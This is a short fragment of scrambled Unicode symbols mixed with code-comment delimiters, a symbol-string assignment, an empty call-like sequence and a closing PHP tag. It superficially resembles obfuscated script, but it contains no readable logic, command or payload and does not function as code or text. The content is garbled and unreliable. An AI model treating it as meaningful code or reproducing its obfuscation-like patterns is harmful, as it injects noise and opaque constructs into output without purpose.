zZVBs!pNⅫ∘ⓛ⌓⒎▤➺≷♈⒢▔►⅙↯囍⒵㊀Ⓥ≔⌒


-*///
TQ/*-


¶⒢ⅲ⑽ⅹ☐「➺⏥∤➁✴∭Ⅷ⊎⓪⒋Ⅿ┄☷↦⑻☒⇎➷ⒺⅡ㉿✷ⅿ╎


1I=¶⒢ⅲ⑽ⅹ☐「➺⏥∤➁✴∭Ⅷ⊎⓪⒋Ⅿ┄☷↦⑻☒⇎➷ⒺⅡ㉿✷ⅿ╎


-*///
();/*-,`+U|!TJ$-*///
 ?>